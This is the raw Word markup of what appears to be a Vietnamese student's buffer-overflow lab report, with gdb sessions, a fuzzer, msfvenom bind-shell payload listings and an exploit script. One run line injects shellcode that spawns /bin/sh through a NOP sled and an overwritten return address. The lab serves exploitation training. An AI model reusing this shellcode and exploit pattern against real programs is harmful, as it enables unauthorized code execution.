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7F90" w:rsidRPr="00464481" w:rsidRDefault="00647DB5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Phạm Quốc Hưng 1050080135</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00647DB5" w:rsidRPr="00464481" w:rsidRDefault="00647DB5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CNPM2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051736B" w:rsidRPr="00464481" w:rsidRDefault="000A4D23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Link youtube:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051736B" w:rsidRPr="00464481" w:rsidRDefault="000A4D23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 xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00464481">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://youtu.be/SbwGUJa-ENU</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00464481">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Bài 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051736B" w:rsidRPr="00464481" w:rsidRDefault="00835472">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="0051736B" w:rsidRPr="00464481">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://youtu.be/uCqQMY3Nm0E</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0051736B" w:rsidRPr="00464481">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Bài 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B20BF" w:rsidRPr="00464481" w:rsidRDefault="00297208">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00464481">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://youtu.be/oQT8L4tBcII</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00464481">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Bai 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000023BE" w:rsidRPr="00464481" w:rsidRDefault="00835472" w:rsidP="0083547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Lab 2</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00647DB5" w:rsidRPr="00464481" w:rsidRDefault="00246A0B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Bài 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00246A0B" w:rsidRPr="00464481" w:rsidRDefault="00246A0B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E65CBD" wp14:editId="57C06682">
            <wp:extent cx="5943600" cy="3907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DB8" w:rsidRPr="00464481" w:rsidRDefault="00294DB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00294DB8" w:rsidRPr="00464481" w:rsidRDefault="00294DB8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95964F" wp14:editId="4C640754">
            <wp:extent cx="4791075" cy="4381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DB8" w:rsidRPr="00464481" w:rsidRDefault="00294DB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00294DB8" w:rsidRPr="00464481" w:rsidRDefault="00294DB8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E35BFE" wp14:editId="077B5007">
            <wp:extent cx="4943475" cy="70485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6A" w:rsidRPr="00464481" w:rsidRDefault="00B9166A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B9166A" w:rsidRPr="00464481" w:rsidRDefault="00B9166A" w:rsidP="00B9166A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Cài đặt gdb và dùng lệnh $sudo apt update &amp;&amp; apt install gdb -y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9166A" w:rsidRPr="00464481" w:rsidRDefault="00B9166A" w:rsidP="00B9166A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$gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9166A" w:rsidRPr="00464481" w:rsidRDefault="00B9166A" w:rsidP="00B9166A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AEA142" wp14:editId="0014E07F">
            <wp:extent cx="5943600" cy="5755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6A" w:rsidRPr="00464481" w:rsidRDefault="00B9166A" w:rsidP="00B9166A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B43341" w:rsidRPr="00464481" w:rsidRDefault="00C57660" w:rsidP="00B9166A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ABA0D8" wp14:editId="38CC98EE">
            <wp:extent cx="5943600" cy="3660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BF1" w:rsidRPr="00464481" w:rsidRDefault="00133BF1" w:rsidP="00B9166A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00133BF1" w:rsidRPr="00464481" w:rsidRDefault="00133BF1" w:rsidP="00B9166A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B43341" w:rsidRPr="00464481" w:rsidRDefault="00B43341" w:rsidP="00B9166A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340710" wp14:editId="79069EE5">
            <wp:extent cx="5943600" cy="62337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BF1" w:rsidRPr="00464481" w:rsidRDefault="00133BF1" w:rsidP="00B9166A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00133BF1" w:rsidRPr="00464481" w:rsidRDefault="00133BF1" w:rsidP="00B9166A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Xác định vị trí của return address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00133BF1" w:rsidRPr="00464481" w:rsidRDefault="00133BF1" w:rsidP="00B9166A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64481">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(gdb)run $(python2 -c "print 'A'*</w:t>
      </w:r>
      <w:r w:rsidRPr="00464481">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">100 </w:t>
      </w:r>
      <w:r w:rsidRPr="00464481">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">+ 'B'*12 + 'C'*8 + 'D'*6") </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00133BF1" w:rsidRPr="00464481" w:rsidRDefault="00133BF1" w:rsidP="00B9166A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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(gdb)info registers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00133BF1" w:rsidRPr="00464481" w:rsidRDefault="00133BF1" w:rsidP="00B9166A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00133BF1" w:rsidRPr="00464481" w:rsidRDefault="00133BF1" w:rsidP="00B9166A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CF47EA" wp14:editId="7BF69822">
            <wp:extent cx="5943600" cy="79800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BF1" w:rsidRPr="00464481" w:rsidRDefault="000F55F4" w:rsidP="000F55F4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64481">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>x/100x $rsp-200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F55F4" w:rsidRPr="00464481" w:rsidRDefault="000F55F4" w:rsidP="000F55F4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EB70B1" wp14:editId="0FC1E7E8">
            <wp:extent cx="5943600" cy="78149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78" w:rsidRPr="00464481" w:rsidRDefault="00EA6A78" w:rsidP="00EA6A78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lastRenderedPageBreak/>
        <w:t>run $(python2 -c "print '\x90'*52 +</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA6A78" w:rsidRPr="00464481" w:rsidRDefault="00EA6A78" w:rsidP="00EA6A78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'\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA6A78" w:rsidRPr="00464481" w:rsidRDefault="00EA6A78" w:rsidP="00EA6A78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x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA6A78" w:rsidRPr="00464481" w:rsidRDefault="00EA6A78" w:rsidP="00EA6A78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xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA6A78" w:rsidRPr="00464481" w:rsidRDefault="00EA6A78" w:rsidP="00EA6A78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x0f\x05' + 'B'*8 +'C'*8 + ' x70\x38\x88\xBD'")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA6A78" w:rsidRPr="00464481" w:rsidRDefault="00EA6A78" w:rsidP="000F55F4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5C027B" wp14:editId="59119B55">
            <wp:extent cx="5943600" cy="8120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C90" w:rsidRPr="00464481" w:rsidRDefault="00225C90" w:rsidP="000F55F4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lastRenderedPageBreak/>
        <w:t>Bài 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00225C90" w:rsidRPr="00464481" w:rsidRDefault="00225C90" w:rsidP="00225C90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Trong cửa sổ Terminal, thực hiện các lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00225C90" w:rsidRPr="00464481" w:rsidRDefault="00225C90" w:rsidP="00225C90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00225C90" w:rsidRPr="00464481" w:rsidRDefault="00225C90" w:rsidP="00225C90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wget -nv https://samsclass.info/127/proj/ED3a.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00225C90" w:rsidRPr="00464481" w:rsidRDefault="00225C90" w:rsidP="00225C90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wget -nv https://samsclass.info/127/proj/ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00225C90" w:rsidRPr="00464481" w:rsidRDefault="00225C90" w:rsidP="00225C90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chmod a+x ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00225C90" w:rsidRPr="00464481" w:rsidRDefault="00225C90" w:rsidP="00225C90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./ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00225C90" w:rsidRPr="00464481" w:rsidRDefault="00225C90" w:rsidP="000F55F4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009910" wp14:editId="16D3F7A6">
            <wp:extent cx="5943600" cy="29222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4D" w:rsidRPr="00464481" w:rsidRDefault="008C664D" w:rsidP="000F55F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C664D" w:rsidRPr="00464481" w:rsidRDefault="008C664D" w:rsidP="008C664D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Làm một Fuzzer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C664D" w:rsidRPr="00464481" w:rsidRDefault="008C664D" w:rsidP="008C664D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- Trong cửa sổ Terminal, thực hiện lệnh: nano fuzzer #!/usr/bin/python import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C664D" w:rsidRPr="00464481" w:rsidRDefault="008C664D" w:rsidP="008C664D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length = int(sys.argv[1]) print 'A' * length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C664D" w:rsidRPr="00464481" w:rsidRDefault="008C664D" w:rsidP="008C664D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9E53D0" wp14:editId="181F4B4F">
            <wp:extent cx="5943600" cy="15786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4D" w:rsidRPr="00464481" w:rsidRDefault="008C664D" w:rsidP="008C664D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 xml:space="preserve"> Chạy lệnh  ./fuzzer 10 và ./fuzzer 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C664D" w:rsidRPr="00464481" w:rsidRDefault="008C664D" w:rsidP="008C664D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F8C107" wp14:editId="64CA57B9">
            <wp:extent cx="5943600" cy="27368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F2" w:rsidRPr="00464481" w:rsidRDefault="00613BF2" w:rsidP="008C664D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Thực hiện các lệnh này để kiểm tra chương trình với các đầu vào có độ dài 1000 và 1010</w:t>
      </w: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./ED3a $(./fuzzer 1000) ./ED3a $(./fuzzer 1010)</w:t>
      </w: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71E9C6" wp14:editId="5D8B401D">
            <wp:extent cx="5943600" cy="26835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Trong cửa sổ Terminal, thực hiện lệnh: nano ex1 -</w:t>
      </w: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Nhập mã này:</w:t>
      </w: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#!/usr/bin/python prefix = 'A' * 1000</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>pattern = 'BBBBCCCCDDDDEEEEFFFF'</w:t>
      </w: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print prefix + pattern</w:t>
      </w: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6DCA7D" wp14:editId="30E6487F">
            <wp:extent cx="5943600" cy="1676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sudo msfvenom -l payloads | grep linux | grep bind_tcp</w:t>
      </w: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D1C97C" wp14:editId="43404D44">
            <wp:extent cx="5943600" cy="31375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lastRenderedPageBreak/>
        <w:t>sudo msfvenom -p linux/x86/shell_bind_tcp --list-options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613BF2" w:rsidRPr="00464481" w:rsidRDefault="00613BF2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97924D" wp14:editId="63D552D8">
            <wp:extent cx="5943600" cy="48812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4D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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lastRenderedPageBreak/>
        <w:t>Xây dựng Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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- Trong CỬA SỔ MÁY CHỦ, thực hiện lệnh: nano ex2 #!/usr/bin/python nopsled =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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'\x90' * 500</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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suffix = 'A' * (1012 - len(nopsled) - len(buf)) eip =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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'1234'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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attack = nopsled + buf + suffix + eip print</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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- Thực thi các lệnh này để làm cho chương trình có thể thực thi và chạy nó. chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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+x ex2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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./ex2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039044D" w:rsidRPr="00464481" w:rsidRDefault="0039044D" w:rsidP="0039044D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- Chương trình chạy, in ra một chuỗi dài các ký tự kết thúc bằng "1234"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034218E" w:rsidRPr="00464481" w:rsidRDefault="0034218E" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0034218E" w:rsidRPr="00464481" w:rsidRDefault="0034218E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74FF73" wp14:editId="5D5BEA56">
            <wp:extent cx="5943600" cy="31553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47" w:rsidRPr="00464481" w:rsidRDefault="00564D47" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00564D47" w:rsidRPr="00464481" w:rsidRDefault="00564D47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Chạy lệnh gdb -1 ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564D47" w:rsidRPr="00464481" w:rsidRDefault="00564D47" w:rsidP="00564D47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lastRenderedPageBreak/>
        <w:t>(gdb) disassemble copier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564D47" w:rsidRPr="00464481" w:rsidRDefault="00564D47" w:rsidP="00564D47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break * 0x08049241</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564D47" w:rsidRPr="00464481" w:rsidRDefault="00564D47" w:rsidP="00564D47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run $(./ex2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564D47" w:rsidRPr="00464481" w:rsidRDefault="00564D47" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00564D47" w:rsidRPr="00464481" w:rsidRDefault="00564D47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088985" wp14:editId="2810AC89">
            <wp:extent cx="5943600" cy="31172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47" w:rsidRPr="00464481" w:rsidRDefault="00564D47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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564D47" w:rsidRPr="00464481" w:rsidRDefault="00564D47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x/410x $esp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564D47" w:rsidRPr="00464481" w:rsidRDefault="00564D47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3A0800" wp14:editId="4FA76848">
            <wp:extent cx="5943600" cy="53174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47" w:rsidRPr="00464481" w:rsidRDefault="00564D47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C3C37E" wp14:editId="44B1A6A3">
            <wp:extent cx="5943600" cy="48545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8D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D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Bài 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D" w:rsidP="00AF0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wget -nv https://samsclass.info/127/proj/ED205.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D" w:rsidP="00AF0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wget -nv https://samsclass.info/127/proj/ED205</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D" w:rsidP="00AF0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chmod a+x ED205</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D" w:rsidP="00AF0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./ED205 HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D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 xml:space="preserve">Xem mã nguồn </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00AF078D" w:rsidP="00AF078D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464481">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat ED205.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF078D" w:rsidRPr="00464481" w:rsidRDefault="00987392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5C91CE" wp14:editId="6C4C3909">
            <wp:extent cx="5943600" cy="6287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358" w:rsidRPr="00464481" w:rsidRDefault="00346358" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00346358" w:rsidRPr="00464481" w:rsidRDefault="00346358" w:rsidP="0034635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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb -q ./ED205</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00346358" w:rsidRPr="00464481" w:rsidRDefault="00346358" w:rsidP="0034635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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>list 31,34</w:t>
      </w:r>
    </w:p>
